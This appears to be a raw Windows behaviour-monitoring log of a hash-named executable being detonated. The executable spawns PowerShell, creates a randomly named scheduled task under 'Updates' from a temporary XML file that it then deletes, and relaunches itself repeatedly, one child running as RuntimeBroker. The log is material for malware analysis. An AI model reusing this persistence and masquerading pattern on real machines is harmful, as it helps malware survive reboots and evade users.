09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wldp.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\userenv.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\tzres.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\tzres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\zh-CN\tzres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_system.data_b77a5c561934e089_4.0.15744.161_none_2c1622a959db26c0\System.Data.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ws2_32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5740,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gpapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\crypt32.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\coml2.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wshext.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\OpcServices.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\xmllite.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\SysWOW64\urlmon.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\tdh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\SysWOW64\iertutil.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5796,	2928,	FILE_chmod,	C:\Windows\SysWOW64\uxtheme.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5764,	2928,	FILE_chmod,	C:\Windows\SysWOW64\secur32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5740,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msisip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Numerics.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5776,	2928,	FILE_chmod,	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0112~31bf3856ad364e35~amd64~~10.0.17763.1.cat,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\mintdh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\AppxSip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:3720,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources\v4.0_4.0.0.0_zh-HANS_b77a5c561934e089\mscorlib.resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5752,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5444,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5748,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_system.transactions_b77a5c561934e089_4.0.15744.161_none_ab0a76020e38cd6d\System.Transactions.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5800,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\System.Management.Automation.Resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5756,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.Resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\schtasks.exe,	target_pid:5176 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\schtasks.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	powershell.exe,	5080:0,	2928,	PROC_exec,	C:\Windows\System32\conhost.exe,	target_pid:7172 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	powershell.exe,	5080:7324,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe,	type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	conhost.exe,	7172:0,	2928,	EXEC_create,	C:\Windows\System32\conhost.exe,	parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:0,	2928,	PROC_exec,	C:\Windows\System32\conhost.exe,	target_pid:8100 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:8784,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe,	type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	conhost.exe,	8100:0,	2928,	EXEC_create,	C:\Windows\System32\conhost.exe,	parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:719,	conhost.exe,	7172:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,	base:0x00007FFCF2C50000 size:0x00279000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:741,	conhost.exe,	8100:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,	base:0x00007FFCF2C50000 size:0x00279000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:741,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:758,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:758,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:772,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	schtasks.exe,	5176:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\schtasks.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8812 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	conhost.exe,	8100:0,	2928,	EXEC_destroy,	C:\Windows\System32\conhost.exe,	parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8812:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:7580 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	7580:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:4964 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8452 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8816 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	RuntimeBroker.exe,	4964:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8452:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_create,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' image_base:0x0000000000820000 image_size:0x0008A000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:4640,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:4640,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	offset:0x00000000 datalen:0x00000516 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\f95c1d21c350fd9102417341a1e75e5b\Microsoft.Management.Infrastructure.ni.dll,	base:0x000000006C680000 size:0x00080000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:897,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475,	type:0x00000003 datalen:114 data:'CB 04 00 00 00 00 00 00 04 00 04 00 01 02 02 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:917,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:917,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\cfaa34000029b18fb89febf12cd0d80c\System.Management.ni.dll,	base:0x000000006C730000 size:0x00130000 ,	0x00000000 [操作成功完成。  ],	
